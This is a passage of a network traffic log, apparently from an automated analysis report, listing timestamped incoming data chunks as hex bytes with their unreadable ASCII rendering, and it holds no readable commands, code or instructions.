be 15 3e 09 a9 78 de 89 18 f2 f4 41 17 b8 de 9f 4b e9 f4 54 e1 8c 2b 32 4d 55 c2 Data Ascii: j#Ibd]w.]ET\|VYtbRGA&o}[fG8G4;vj5cXno+~NJMe`p8Wy&R[(s8((A#)Bi#\Ni=mQA)B78LHjC0NmSXy)v($I>xAKT+2MU
2021-12-14 11:52:59 UTC	76	IN	Data Raw: 0f 0b e3 2e 1b 95 fc 3f 8e fa 1b f0 dc 5c 49 51 ee 9d 96 54 91 a2 ba 25 cc 06 57 55 07 55 9a 87 38 d8 b5 0b 39 e2 3b 6f 85 6d fc 9e 99 01 77 5d dd 96 68 2e 4c 9c e9 27 be 73 a3 5a 5f 10 9d f0 06 7c a2 73 84 a9 80 84 01 af de c2 2d 10 ff 0d f5 bf 9d 00 96 eb 84 7b 19 34 a1 17 93 ea c1 9e f9 bc 99 9b 77 b0 0c 6b 2a fd bb c2 32 20 dd f7 89 31 f2 be cd ed c9 ca 14 5c e9 41 30 fa 72 6f 08 bf 2c 01 fd 7d 8d 6b d9 c5 72 ee 39 45 13 c5 eb 3a a1 5d 14 85 b4 d6 66 0a f7 46 89 56 8c 99 9a ef 94 73 74 82 cf bf 2c bd bd 9f cb 91 85 01 e0 5a 47 bc 0d e1 d7 c3 76 33 88 e3 8e 5d 92 37 8e 38 67 70 b4 7c 52 1d e1 08 97 5a 3a 09 31 13 cf 09 d5 69 34 ce 2e 51 d1 b5 2e aa 6e 2a f6 e1 1a 86 2f 00 5d ac dd cd 49 e2 65 67 6c c0 d4 0c 20 d4 67 44 46 1f af be 8d 57 a5 d0 b9 17 85 Data Ascii: .?\IQT%WUU89;omw]h.L'sZ_\|s-{4wk2 1\A0ro,}kr9E:]fFVst,ZGv3]78gp\|RZ:1i4.Q.n/]Iegl gDFW
2021-12-14 11:52:59 UTC	77	IN	Data Raw: 78 1c 96 d9 dd 9e 6c 7e 48 57 1f 05 d5 93 6c c3 3f 21 18 49 da c1 88 ae 39 f8 01 1c 11 17 00 b3 6d 2b b7 6e 3d 86 5f 89 b2 8d 97 e8 2d ee 22 5f 79 83 20 f8 ad a1 3f 7f 88 6d 40 4f a2 5e 20 dd cd a8 b4 c4 09 33 22 65 60 2e df 5a 86 73 df 71 7a 2e a4 6f 99 98 ce 71 db 2f 37 dc 7e 7d 5c 95 47 b5 98 06 6c b1 82 66 66 8c d1 cc 58 69 16 07 41 dd 3b 97 f2 c0 aa 77 b0 4a 9d ee 1a 45 15 c2 75 27 a6 1b 8a 4f cc 1d f9 38 f9 19 9d 93 0d b0 9e 61 89 ca 8f d3 b8 a9 0a 85 fa f1 32 0f 25 15 65 7d 79 01 e9 a5 d8 17 ec 80 4f 77 5f e7 ce 8c 68 db 7e 98 c7 2c 85 ff c6 5a 1d a5 02 6b 54 a6 33 e3 50 d1 8d a2 9e 9e 2a f6 41 1a 65 46 b8 42 28 3c 45 09 8d 58 b2 6b 95 ba 9a b9 74 41 59 23 4f 74 0c c8 69 6a be cd dd a6 0a ee dd 3c 35 00 53 dd 5c 75 b7 6a 5a 2d cd 87 12 fd c7 ef 33 Data Ascii: xl~HWl?!I9m+n=_-"_y ?m@O^ 3"e`.Zsqz.oq/7~}\GlffXiA;wJEu'O8a2%e}yOw_h~,ZkT3P*AeFB(<EXktAY#Otij<5S\ujZ-3
2021-12-14 11:52:59 UTC	79	IN	Data Raw: b3 01 b5 c7 cd ad be b0 68 11 43 22 23 a4 3b 51 cf 17 2f 99 ab e0 ee 0e 49 48 d3 44 81 24 82 be fc 46 c9 19 09 a1 a9 27 25 ea 2b 59 7b fc 3f 59 c3 dc 29 f9 ef df de de 6e 4f 1d 16 c0 5f 0a ce 6f 04 01 ef 1e dd 94 d0 37 7b fa 36 39 d9 0d 33 51 ef 89 bc 62 93 a1 a2 34 2d 17 5c 3d 67 55 9a 82 09 e8 b1 18 27 e1 3b 1c a5 6d fc 8f b1 96 77 5f ff 83 40 47 47 9f ce 38 81 65 33 5b 59 69 db e8 07 76 d2 7b 29 ea a9 b3 07 c0 97 eb 03 14 fd 08 d7 d5 a0 00 90 8e 71 79 1f 14 ce 2c 93 fa c7 9c 96 fe 98 9b 6b a9 24 46 35 fd bd ac 02 12 d9 fd c5 62 f3 be eb ef a6 99 3d cb ef 42 12 b8 63 79 26 45 06 03 f7 18 f8 3f d8 cf 7e 32 5a 2f 25 c5 ed 33 a1 24 11 85 b8 67 4d 0e dd 4c e7 11 8d 99 9c c5 8a 60 51 95 cf 9b 36 bd bd 96 d5 93 bc 08 e9 71 56 96 19 c6 2a c2 ff 33 90 e8 2d 5a Data Ascii: hC"#;Q/IHD$F'%+Y{?Y)nO_o7{693Qb4-\=gU';mw_@GG8e3[Yiv{)qy,k$F5b=Bcy&E?~2Z/%3$gML`Q6qV*3-Z
2021-12-14 11:52:59 UTC	80	IN	Data Raw: a5 c6 1d 5a b1 c2 1e 9b 32 30 12 e6 ce 71 53 53 07 0f 65 29 ae f3 ac 6f 08 fa be 89 5d eb bd 05 47 e1 90 81 24 ed 27 56 d3 da 54 9a 24 93 68 3a f5 ee b6 9b ee f3 8d 9e 0e 44 eb ac ed 2d 74 b3 9d c4 8a 97 ea d6 84 9f 2f 57 59 35 04 ff 93 6c 5f 38 2e 17 56 fe 5d 92 b1 8f 1a e7 16 11 17 9c b5 61 0a aa 09 89 80 40 9b 9a 0c 97 f9 3b 79 0f 5b 6a 9d ab 00 b3 99 1d 80 83 6d 47 c5 5a 40 19 ff 68 a3 b4 c3 8d cb 3c 5f 7d 16 41 77 7a 66 84 bc 7a 2e a0 d9 bd 85 d5 2c 03 2f 37 d8 c8 7b 43 8c 4b fc 06 00 5b ab a2 88 60 8c d1 41 48 7d 26 03 0e 46 2a 76 ef f3 a7 f3 bd 55 87 e7 a5 d8 3f df 7c 33 b3 80 94 ae d2 11 16 13 fb 32 e2 97 69 f9 81 1a 11 e6 b2 f0 a4 c0 ff 83 e5 d7 38 83 25 15 76 d1 7d 1e e2 85 3d 17 ea 80 d3 60 56 c8 fa dc f4 da 76 43 d9 46 1b e1 d2 7c 05 be 60 6c Data Ascii: Z20qSSe)o]G$'VT$h:D-t/WY5l_8.V]a@;y[jmGZ@h<_}Awzfz.,/7{CK[`AH}&F*vU?\|32i8%v}=`VvCF\|`l
2021-12-14 11:52:59 UTC	81	IN	Data Raw: f0 2f 43 fa 64 5c c7 bb 78 f2 08 7b d6 7b 7c ed 86 41 d3 1d 9b 55 05 73 2c 34 18 34 a2 3a ab 54 cc 52 5f 91 0d 09 b0 63 e0 01 e5 b6 3d 76 30 d7 95 88 d9 8b 3b 0d 14 6e c7 11 dc 96 a4 c4 84 a5 f9 8c 8b b7 c0 d3 45 32 9b 6a 3a 40 1d d4 b2 68 8b cf 17 21 a4 05 dd ed 73 31 60 66 40 ab 2e aa e4 ef 76 c1 12 3e a8 ba 2c b4 fb 20 57 60 09 15 6e ea ca 39 01 ff fb 46 ee dd 4b 1a 06 16 e7 22 cc 7e 19 29 87 07 23 93 d4 5c 51 f8 17 f2 b6 77 49 57 80 ab 94 54 97 bd 84 36 26 17 47 4b 02 44 64 87 0f e5 a0 03 06 e8 05 17 5b 92 03 90 a3 85 7c 5d c6 9f 5f 49 b3 9d cf 23 b8 5c 1e e1 5b 1a f4 85 2d 7e a8 7f 45 b4 bb b8 01 be df f5 0a ec fe 27 f5 80 a2 13 9c f2 52 64 15 0d aa 17 83 f1 d7 60 f8 90 9a 8c 7e a1 0c 68 3b e2 a9 3d 28 3c db dc af 09 d6 40 12 12 c0 f1 3c cb fa 71 3f Data Ascii: /Cd\x{{\|AUs,44:TR_c=v0;nE2j:@h!s1`f@.v>, W`n9FK"~)#\QwIWT6&GKDd[\|]_I#\[-~E'Rd`~h;=(<@<q?
2021-12-14 11:52:59 UTC	82	IN	Data Raw: c3 82 d5 bf 4f af b1 28 a2 43 31 86 ea c3 28 39 2a 52 27 97 29 b1 16 ff ba 8b b9 46 bf 58 0f 4c 46 18 a7 76 68 be c7 f3 9e 08 ff c1 3d 07 08 57 da 5a 8f ac b8 59 19 dd a7 ea eb 39 ee 19 17 ad cf 48 6a c9 01 44 1a 7b cb c7 ad 4e b5 8a 10 f3 02 4a e1 19 0b 0f 4a bf 7e c7 39 da 70 c5 e2 21 18 3d 65 03 b8 7a 29 00 b3 61 c9 87 1f e5 ee 87 65 95 dd 87 49 e3 e5 48 7f 89 d3 22 67 39 5a 25 b0 c8 57 dc 64 53 34 bb 05 63 a8 16 e1 95 ae 7e e4 26 10 c1 14 86 bf 2b b7 d8 e6 e0 01 37 78 6c 4b 1b be 58 c3 19 68 d7 6d 43 c6 9e c1 41 31 89 57 3b ef 06 34 1e 16 c0 09 a9 75 d4 cc 32 07 11 1a b1 75 d9 24 fb 48 36 4c 39 ce b4 b7 dd a3 4d 06 c9 c7 d4 18 a8 b4 b7 c3 ec 13 ed a4 00 be d1 d2 40 ae 8a 79 2a 50 18 af 6f 40 28 c5 04 39 98 97 f3 fc 62 20 27 37 41 ab 2e 91 b5 e8 64 c0 Data Ascii: O(C1(9R')FXLFvh=WZY9HjD{NJJ~9p!=ez)aeIH"g9Z%WdS4c~&+7xlKXhmCA1W;4u2u$H6L9M@yPo@(9b '7A.d
2021-12-14 11:52:59 UTC	83	IN	Data Raw: 02 28 2e 7c 5c 12 97 6e f3 cf 78 30 26 5d 26 c5 c3 30 89 65 a5 85 be 19 70 07 f6 5d 88 41 9b 67 9b c3 96 6b 6a 97 c8 a5 c8 bc 91 9c c2 98 ad 19 fa a4 4c ba 1c fa d6 e8 30 33 f3 4f 2d 5d 96 0c ba 37 5c 9a 1a 7c 52 19 c2 1f 69 5b 05 3b 2a 1e 40 00 ca 67 78 cf 02 4e 17 98 16 d0 6c 02 e2 e1 13 9b dd 1e 7e a3 c5 c9 56 f3 83 98 41 e4 e1 7f 20 af a1 5b 5f 16 21 00 a3 65 42 dc 95 16 a6 e4 cd d0 77 42 72 9e ff ab cd 1b 7d 2e cc c8 ec a5 2b 56 48 49 bd c7 71 58 dd 73 37 55 67 0d 84 c7 2e 7d a3 e2 fd e5 6f c2 b4 56 1b 26 07 e6 0b c7 7c 2a 61 8a fe d8 c0 ca 79 b3 6b 91 cc 19 2d 3e 57 76 f3 f8 85 69 60 a4 bd 5d 78 f0 ca e3 21 0e 0c 54 c4 19 3c e2 82 14 ea 53 27 e0 b2 10 16 c1 bf ea f6 60 2c e6 38 7a db 5b 75 80 aa 0e 65 b5 1b e8 8c c6 1e e9 b7 2d 84 f7 a2 4d db f6 84 Data Ascii: (.\|\nx0&]&0ep]AgkjL03O-]7\\|Ri[;@gxNl~VA [_!eBwBr}.+VHIqXs7Ug.}oV&\|ayk->Wvi`]x!T<S'`,8z[ue-M
2021-12-14 11:52:59 UTC	85	IN	Data Raw: ab 2c a6 18 e6 33 cd 31 fa 11 80 fb 7e 91 72 57 29 66 5b f7 7b 5c 90 d4 63 87 d2 b3 1a 0f 2f 61 54 4d 7b 1a bc 6c d8 17 ee 9e 5c 69 49 fd ea 88 4d 22 68 4a da 02 fc 2f cd 5a 1e c0 bd 68 78 ae 5a ac 52 d6 9f 74 dc b0 28 d7 55 02 b7 5b e5 3b 27 3c 50 2c b0 68 4f 17 d3 b3 a2 28 5d 41 59 3c 6f 57 01 c8 50 65 a1 d2 25 a7 26 f6 f3 3d 1d 1b 53 c5 6b 98 b9 46 49 3a d9 af eb ea 15 cf 1d 76 07 c8 9e 4e 19 40 46 1a 10 f3 52 de 0c b7 d5 7b d6 5a 5b e5 13 0c 4b d3 41 7f eb 36 f1 74 a5 d5 32 17 28 6f c5 bb 56 36 02 b8 7b cf fc c4 e1 f9 7d 6d a8 d7 09 ed 76 8b c6 64 bc 3e 2c 4b 2b 42 29 a2 36 47 f4 6a af 33 13 16 40 82 67 6a 9c 8e 11 7d 17 13 c7 ec 81 a0 3c 0b d7 e6 e0 0c 56 f0 92 4a 3d b4 79 fc 10 6a cc 73 45 bc 9d bf d8 20 8f 75 77 c7 28 3e 71 9e d7 3a ad c1 c4 d4 5f Data Ascii: ,31~rW)f[{\c/aTM{l\iIM"hJ/ZhxZRt(U[;'<P,hO(]AY<oWPe%&=SkFI:vN@FR{Z[KA6t2(oV6{}mvd>,K+B)6Gj3@gj}<VJ=yjsE uw(>q:_
2021-12-14 11:52:59 UTC	86	IN	Data Raw: e0 18 71 bb 76 5a aa a7 ac 3c 51 d5 c6 74 10 84 c2 ff 97 a1 08 87 e5 8c f4 34 1e a1 15 ba b3 c3 9e f3 be e2 5d 6d aa 08 7f 43 bc b9 c3 23 01 dc 84 e8 33 f2 b4 c5 aa cb db 36 c2 ff d7 49 ba 64 79 2a 02 6a 03 f7 18 9e 7d 4f bc 3a 32 35 67 0c 82 e9 30 83 6c 0c 13 cd 4a 64 0c d7 6e cf 44 8c 93 93 f6 02 00 23 95 cf b9 1e fa bf 9e df bb e5 1c e2 50 44 8c 88 66 bb d6 d2 31 82 9e fb 5d 92 22 87 0b 4c e8 b6 6d 5d 02 d0 e1 68 77 1f 33 7f e7 30 ff d5 5e d9 c0 02 4e 0e 8a 24 54 6d 2e e8 f7 1d 9f 2e 0c 56 be d6 d7 59 fa 8a 69 5f df 12 7d 0e df 7c d6 cd 12 af b6 9f 53 43 c2 9a 1f ac 15 d3 e2 90 41 25 79 f6 ba c0 15 fd 07 da d7 e1 cf ae 1a eb 49 bd c7 5f 1b da 59 6b 03 4f 95 9e 39 25 e8 25 fe e1 e8 b6 ce ae 72 30 38 fb 9c e1 d4 6d 28 f8 b1 d6 02 f1 00 47 af 71 9c c6 03 Data Ascii: qvZ<Qt4]mC#36Idy*j}O:25g0lJdnD#PDf1]"Lm]hw30^N$Tm..VYi_}\|SCA%yI_YkO9%%r08m(Gq
2021-12-14 11:52:59 UTC	87	IN	Data Raw: 50 f1 a3 b4 c1 39 87 22 49 68 07 a6 b7 65 71 a0 1f 09 6f a2 45 b1 8b c8 7f f1 2d 37 d2 7c 3a 5e 95 5e ad d2 04 44 bb 8b 70 f6 3b be c8 4f 62 37 61 93 da 2c 6d ec cb bb 60 bb 5b 95 e7 f0 ba 38 ec 71 2e a0 98 fd 30 cc 31 fd 9f c4 32 7e 90 65 d1 81 74 9e ef ad c0 b4 cb 76 7b fb d9 15 1e 2d 3d 67 4d 7b 0b d2 a3 c7 01 f9 8f 4f 77 46 fa 1b 96 44 df 7e 75 c9 00 96 e8 d2 17 e4 b2 d0 68 53 a1 1c 76 a3 29 6a 76 9f a9 18 da 43 40 81 44 c3 9e 28 3c 50 21 d4 9c b1 16 fb b9 1e 2c 41 4c 19 67 5a 44 0e ca 42 19 ff cf db ac 13 95 b8 75 1c 1b 59 f2 0c 89 b6 4c 70 7d c4 87 1f f3 56 6a 1e 0d c9 bb df 48 6a 0b 3a 5e 18 eb 32 85 04 b7 d5 7b 72 f8 59 e5 18 16 1d 5e 43 04 20 29 d8 63 86 90 21 63 fc 4d 3b be f4 94 06 ab 70 b6 4c 0e e1 fd 0d e6 b9 de 9e 58 9c 2e 59 7b 9b a3 94 c7 Data Ascii: P9"IheqoE-7\|:^^Dp;Ob7a,m`[8q.012~etv{-=gM{OwFD~uhSv)jvC@D(<P!,ALgZDBuYLp}VjHj:^2{rY^C )c!cM;pLX.Y{
2021-12-14 11:52:59 UTC	88	IN	Data Raw: c6 60 65 72 aa 04 23 9f d4 76 52 f8 17 cc e8 28 4b 2a 24 8d 96 50 98 b3 8c f3 a2 3d 56 40 1f 2e 4a 86 23 ec a0 06 3f f6 3a 6f af 6f 87 49 b1 96 73 5a a4 d5 42 47 47 8d eb 40 eb 59 36 51 77 5d f0 ea 0d 6d ac 0a 16 b9 a8 b9 29 e8 d6 ea 09 3a b7 09 ff 9d b4 05 87 ec d5 52 1f 1e a3 6c 5f fa c1 9a 4e d3 8c 9a 6d a0 ae 41 1a fc bb c3 2b 6b 11 f7 aa 35 81 ff ef ed c3 c2 56 b8 ab 43 3a f2 4e 3a 22 2a 27 17 b7 1f 96 6a d9 cd 03 fb 35 6d 20 cc fa 36 5f ea 3e 85 be 0a 1d dc dd 46 8c 57 81 b1 d3 ed 94 79 63 ec 09 b3 36 b9 ba ed 94 91 ad 14 f3 52 3e d4 1c d1 de eb 94 33 88 e9 3c 59 e1 6a 9a 35 55 cf f1 7e 52 17 c0 57 6b 5b 1c 1a 2c 0f c2 8f e3 67 ca cd 79 92 01 95 2a 1d 03 17 e3 e1 10 2e 1b b0 52 a1 dd c6 2d 31 9b 66 44 c1 fd 7a f4 5b 4d 5b 5f 10 d4 67 92 4c 5f c0 98 Data Ascii: `er#vR(K$P=V@.J#?:ooIsZBGG@Y6Qw]m):Rl_NmA+k5VC:N:"'j5m 6_>FWyc6R>3<Yj5U~RWk[,gy*.R-1fDz[M[_gL_
2021-12-14 11:52:59 UTC	90	IN	Data Raw: 97 21 a6 16 9b dd ca 99 03 23 5b 52 04 dc e9 1f 53 c3 3e 30 0e 61 75 c1 94 a4 b3 58 07 07 15 11 11 b7 e4 0f 9d d0 16 86 59 91 37 8a 97 f9 3a f6 03 55 73 92 21 8a 93 8d 3d 66 21 7c 4d 4e 4d 5a 24 ce da a3 be 61 00 c7 30 40 73 0c c9 65 7d fc 8b 19 7a 2f b3 4e aa 91 db 1a 2f 3e 3c cf 43 e1 4d 9e 7c 26 9a 06 4e a0 89 71 f0 a0 da cc 47 75 a7 34 50 da 2c 63 e0 e9 80 7e bb 4a 90 5a e2 55 3d 5a 76 04 6b 18 92 b7 da bc fc 13 fb 33 6d 9b 67 d3 88 49 43 e4 ad d7 19 c5 69 91 ee e1 30 ac 25 15 7c 5b f7 3e c1 a5 d9 01 c2 74 4e 66 43 c0 e7 bc 2d de 6b 1d 0a 00 87 e3 b9 d8 1a b3 fd 7b 7c b3 f2 65 45 d6 95 5d b7 f4 2a dd 49 45 a7 44 c3 33 55 f0 41 23 ab 58 ca da ff ba 9e ac 5a 47 48 27 c6 6c 92 c8 41 60 1c dc df b1 dc ec cf 26 1a 0a 5b e4 06 75 49 b9 5a 37 bd 4e 15 eb 3d Data Ascii: !#[RS>0auXY7:Us!=f!\|MNMZ$a0@se}z/N/><CM\|&NqGu4P,c~JZU=Zvk3mgICi0%\|[>tNfC-k{\|eE]*IED3UA#XZGH'lA`&[uIZ7N=
2021-12-14 11:52:59 UTC	91	IN	Data Raw: dc 57 a4 0a bf ca fd 83 bb 9c 6c 36 53 08 e0 a7 40 28 4f 3f 89 b2 89 e8 93 4f 30 48 d9 48 c4 97 83 be e5 65 cf 08 25 ce 1d 26 b4 e0 a5 ff 7b cc 7b 43 c3 db 2f 03 81 47 dd c6 6f 5c 08 16 2d 4f 1e 9f 79 0f 01 f9 14 32 84 66 26 5c e9 19 cb d7 19 fa 50 ef 87 85 5e 85 b1 81 22 25 06 5a 68 39 55 9a 8c 35 c8 a8 0b 15 e2 29 64 8d f9 fd 8f b7 85 7e 7d d6 95 40 47 c0 b7 e3 33 a8 48 3b 7b 5e 1b f2 ea 8a 57 a8 79 5b a8 af a2 0a 87 6b e8 03 14 e9 1d ec 84 b7 13 87 ec 7a 7b 1e 1e a1 04 86 e8 d5 b6 6f bd 99 9d 7e a3 1d 72 18 2c bf c3 2f 06 cf e4 be 23 e6 af ea cd c9 da 3c cb fa 52 28 eb 4e ef 21 2a 2b 12 fe 61 b5 68 d9 c9 6b 38 24 65 35 c9 84 18 8b 65 12 93 ad 0d 70 1d d0 c8 3f 51 56 8a 8f fc 9a 58 75 86 c2 a2 38 2c ab b0 c7 82 a8 09 34 49 48 87 10 c6 02 d0 dd 20 86 f2 Data Ascii: Wl6S@(O?O0HHe%&{{C/Go\-Oy2f&\P^"%Zh9U5)d~}@G3H;{^Wy[kz{o~r,/#<R(N!*+ahk8$e5ep?QVXu8,4IH
2021-12-14 11:52:59 UTC	92	IN	Data Raw: 92 e7 a5 c2 18 cf a6 df 36 6b bc 87 04 52 a3 6b 73 86 14 09 74 b3 be 16 8f dd 0e d6 a9 3d 88 f3 a2 4b ca e1 01 e2 1a 71 20 60 d2 93 c8 96 48 c3 75 47 63 92 a0 bb f1 cd 02 a8 17 4f 85 a6 71 2b d4 bf 82 b7 00 9c f6 df 8d 15 3b 4b 41 3d b0 ff 93 6a d0 3a 20 1c 5f 26 c2 9e a8 b3 2d 29 c5 15 17 06 a2 7a 97 c9 6e 15 87 77 97 bb 8d 9d 8a 62 e7 09 4e 03 8d 20 dc bb 5b b0 4c 83 6d 46 4a 59 5c 08 ce df b2 b1 4d a6 df 20 5f 4a 6c dd 71 63 62 a0 08 7e 38 5e 46 b0 9d e1 1b 9b fc 33 d8 52 6c 58 19 28 85 9a 07 6c af 83 66 6a ff 88 df 4e 68 47 0d 44 f0 2c 69 f3 ff 98 6a bb 8e 9b f8 e4 84 39 c0 73 3a b5 16 aa 04 cc 31 fb 13 ea 38 61 9a 88 d8 b2 6d 9c e6 bc d6 35 63 51 d6 e5 f9 0b 05 25 04 7c 57 85 00 ed a3 ce 04 ec 9b 5c 6c 49 fd ef 88 78 22 68 4a c0 2b 98 f8 dc 49 10 b3 Data Ascii: 6kRkst=Kq `HuGcOq+;KA=j: _&-)znwbN [LmFJY\M _Jlqcb~8^F3RlX(lfjNhGD,ij9s:18am5cQ%\|W\lIx"hJ+I
2021-12-14 11:52:59 UTC	93	IN	Data Raw: 06 f4 d9 34 49 eb 66 49 7e 19 71 ed 1f 40 e5 7b 6d ec 43 bf d4 1d 8e 5f 2b a8 83 35 1e 1a fc 3a aa 42 db c8 4c 94 1a 1a b4 79 f1 06 e1 48 3c 5b 0a c5 ba 99 c3 e1 4b 1e 0e 68 d6 19 b3 87 ad c4 1d ad ed a4 cc b5 c0 c4 47 ac 9a 7d 29 46 1d cb b0 53 2c db 1b 3d b9 9d f1 e8 67 3d 4b c1 41 b9 20 90 bc fd 76 d9 1c 33 a2 81 8b b5 ea 2d 71 6a f5 14 42 eb 6b 3f 07 e8 e0 da d7 63 4d 61 d9 3e 5e 22 ce 03 d3 01 e8 02 35 0f 87 ea 50 f8 19 b5 45 77 49 57 ed f6 4a 54 91 a6 9c bf 56 f7 56 40 19 3a f1 84 23 e2 6f 43 32 ca 0c 6f a5 67 ef 87 b2 87 7f 75 b8 94 40 41 65 49 e7 33 af 73 99 5a 5f 1c d4 fc 14 7b 80 41 5a bb a2 6d 22 8a fc dd 03 12 f5 18 f6 94 85 01 96 e1 da 53 ca 1a a1 11 ba 55 c0 9e ff 9a 8f 88 6a 82 34 79 30 f7 65 c3 38 17 e0 71 ab 31 f2 a8 ef 96 15 db 3c cf 67 Data Ascii: 4IfI~q@{mC_+5:BLyH<[KhG})FS,=g=KA v3-qjBk?cMa>^"5PEwIWJTVV@:#oC2ogu@AeI3sZ_{AZm"SUj4y0e8q1<g
2021-12-14 11:52:59 UTC	95	IN	Data Raw: 58 3f 4c 73 2c 3d 39 2f 5b 92 f0 fe fb b3 a1 cf 7f 2f 2b 23 8c c6 d6 76 3a c7 e7 ed 02 f7 17 e2 9e 70 9c cd 04 20 d4 7e f9 f7 ee a5 5b 7c a4 b4 41 e9 81 e4 e1 3c 25 1d 56 c7 c7 52 32 81 3f e2 5e b2 ec b4 c2 05 5c d8 b4 3c 63 38 16 05 7c a7 51 71 80 0d 18 bf a6 b1 fb 82 ef a9 fa be 15 5d e6 ac 22 ec e5 8d 94 05 4b 4e a6 cd 92 c2 8f 37 8b 7b 52 52 6a a9 91 f1 cb 00 96 7e 78 f6 a6 7b 3d 7a b3 ed 54 16 91 ff b4 f4 01 29 42 44 18 c8 f2 bb d0 c1 3e 37 03 26 b6 c3 94 a4 b3 0c 07 07 1f 78 37 b1 7e 11 a4 62 02 50 30 82 bb 8d 9d 96 56 e7 09 4e 75 95 3c 2e 82 8e 3d 61 ec 02 45 59 56 79 1d d4 dc b2 ba ac 26 cf 23 43 0d 6a df 71 6f 57 8f 3f 6b 23 88 34 bb 9a cb 21 ae 3e 3c f0 7a 7e 5c 93 3b ea 98 06 4e 97 93 6d 66 9d df b2 79 60 3d 16 2e b5 2e 69 f9 ca b9 61 ac 9c 89 Data Ascii: X?Ls,=9/[/+#v:p ~[\|A<%VR2?^\<c8\|Qq]"KN7{RRj~x{=zT)BD>7&x7~bP0VNu<.=aEYVy&#CjqoW?k#4!><z~\;Nmfy`=..ia
2021-12-14 11:52:59 UTC	96	IN	Data Raw: 57 c7 2b d8 61 82 7b 22 18 31 67 3b a9 4a 20 0b 83 72 cd 87 c7 e1 f9 68 72 b2 f5 84 5a e0 f2 a7 7a b3 2f 3b 40 3a 4a 20 4a c9 6a da 68 a6 35 90 1f b6 ab 11 68 b7 86 55 1c 0e 04 dd 8c f1 bd 2b 12 f2 94 f3 78 97 eb 6c 4f 3d a9 5a ef 0e 15 03 7b 6d e2 9f c4 09 31 89 59 42 39 28 34 14 36 d6 29 9b 5c db 8e 4c 94 11 1a bb 63 f1 08 d3 5f 3c 5a 00 c7 8a e4 3e a3 4b 08 17 40 44 19 a8 bd 88 cf b7 81 ef a4 0c c6 e9 d7 53 b5 e6 6e 2c 73 01 c4 86 bf d7 cf 17 1a b8 a1 cc ef 73 36 3b 89 41 ab 2e f8 bc ec 0b 14 19 21 a5 ab 23 c9 0a 2b 48 69 dd 14 42 d0 eb 3d 07 ab f3 dc c6 65 4f 1a 00 3c 5d 22 e4 ca 0e 01 ee 03 0b 07 fd 35 5a d4 16 f2 f5 74 49 57 9c a4 94 54 9b d8 84 21 05 85 57 40 17 79 91 ae 0d ea b1 0d 64 cb 39 6f af 17 fe 98 cc 77 77 5d d3 96 45 49 49 b4 9b 33 a9 5d Data Ascii: W+a{"1g;J rhrZz/;@:J Jjh5hU+xlO=Z{m1YB9(46)\Lc_<Z>K@DSn,ss6;A.!#+HiB=eO<]"5ZtIWT!W@yd9oww]EII3]
2021-12-14 11:52:59 UTC	97	IN	Data Raw: 00 95 28 b0 67 02 e5 f7 e4 8d 0f 1d 45 aa dd c3 4c 04 9a 4a 42 e3 ee 57 9d fe 67 5b 4c 22 ad b7 48 4c 5b d1 59 1f bd 0b da ef 6b 78 c5 58 ff ab c9 0d e9 12 b2 c9 c0 b3 72 53 36 4e 0b c6 5f 1d a9 8c 2b 58 6d 77 48 39 2f 5b b6 fc ed fe b9 df ba 6a d1 20 29 9e d5 d4 79 2e fe 38 f2 fc f0 2d 65 9e 76 e1 27 10 34 c4 4a 49 f2 ee be 76 72 ad 4a 4a aa fb ef 8e e1 03 0c 57 c7 ed 2e cb 80 2e ed 66 5d e6 89 d1 1a e3 49 dc 88 62 32 36 61 af c8 6b 79 f3 d1 0f 65 bf a5 f7 85 c4 0d fa af 10 42 09 a3 61 d0 e4 8f ed ae 70 21 4e c7 88 db 99 3b 8b 72 5f 97 e9 85 9a f3 ce 62 2c 10 4f f2 ac 68 38 6e bf 93 a3 0c 6f f4 f7 93 05 2e 35 bc 15 d9 fb 88 7f c6 3e 20 1d 54 26 c0 b8 a7 97 55 d6 16 11 1d 1e a0 7b 1b a4 6b 03 78 5e a5 b9 9a 84 fc 3b f4 0c 5b 73 7a 36 2a ae a6 38 5f ac 92 Data Ascii: (gELJBWg[L"HL[YkxXrS6N_+XmwH9/[j )y.8-ev'4JIvrJJW..f]Ib26akyeBap!N;r_b,Oh8no.5> T&U{kx^;[sz6*8_
2021-12-14 11:52:59 UTC	98	IN	Data Raw: 36 f8 e2 05 01 a5 78 5a bf b7 ba 0c af dd f7 fd 13 d3 02 f7 94 d8 0f 97 e1 5e 65 12 1e a8 0d 6c fb ed 94 fa 94 0b 9a 6d a0 20 91 2b f0 bb ca 3f ee d8 db a8 26 ff be e4 f2 c0 25 3d e7 eb 6a 3f c0 0c 86 df d5 25 2b f7 01 a7 68 d9 63 78 30 35 bd 24 c5 fa 26 85 5d 8a 85 be 08 66 04 c0 b8 89 6a 85 9e 98 92 9a 72 61 93 d1 bf 36 b5 a6 60 d4 bf a9 35 0c 46 41 96 16 c9 2a c2 ff 39 fb 58 2c 5d 94 2d 81 39 5f ef a9 75 ac 1c c4 15 6e 5f 6b 18 28 1e cb 1f c0 6b ca c7 1c a1 00 b9 24 ad 74 7f f0 e0 1a 88 3c 16 5e a1 d5 d3 a8 fb b7 64 58 c4 ec 74 3b 2a 66 77 55 11 87 25 93 4c 51 fd 9c 05 b1 1a c4 e0 90 41 25 51 f8 a8 b4 13 ed 0e 48 d5 e0 a5 7c 6c 36 48 91 ca 58 65 49 59 2b 52 1a 0b 9f 39 2b 4a b6 e1 f6 ed 47 cf 93 7f 38 2d 05 95 d2 cd 82 2f c3 3f c2 07 c9 5c 90 66 8f 9b Data Ascii: 6xZ^elm +?&%=j?%+hcx05$&]fjra6`5FA9X,]-9_un_k(k$t<^dXt;fwU%LQA%QH\|l6HXeIY+R9+JG8-/?\f
2021-12-14 11:52:59 UTC	99	IN	Data Raw: 4e 09 c0 ca 5d b5 ef 18 f5 00 48 62 05 c2 60 76 74 a4 08 7f 31 b4 bb ba b6 c2 0e c8 21 36 d8 50 12 a6 95 54 8f 85 13 57 b4 82 77 65 93 c0 23 4f 4e 2d 1e 46 b4 a9 6f 9d 69 c7 bc ba 4a 9c e7 f6 57 3c c0 73 29 b9 16 6c b0 e1 27 f9 11 80 3e 7f 91 72 d1 f1 e8 8f e0 a7 be 6a d5 63 83 e5 fe 0b 0a 25 04 73 57 85 00 ed a0 ce 1c f1 93 4a 66 58 e9 fa 82 96 dd 45 69 c4 7b 89 e6 cd 5e 75 19 fc 6a 72 bb 32 fb 55 d6 84 59 80 bf d6 dc 6f 3d 8e 55 c7 16 9a c2 be dc b0 54 a2 13 ff ab 9f a2 51 bf 58 0f 46 46 09 ca 3a 7a bf cd df 28 bd 47 1c 59 9b 1d 3d 5f 24 58 b7 46 5e 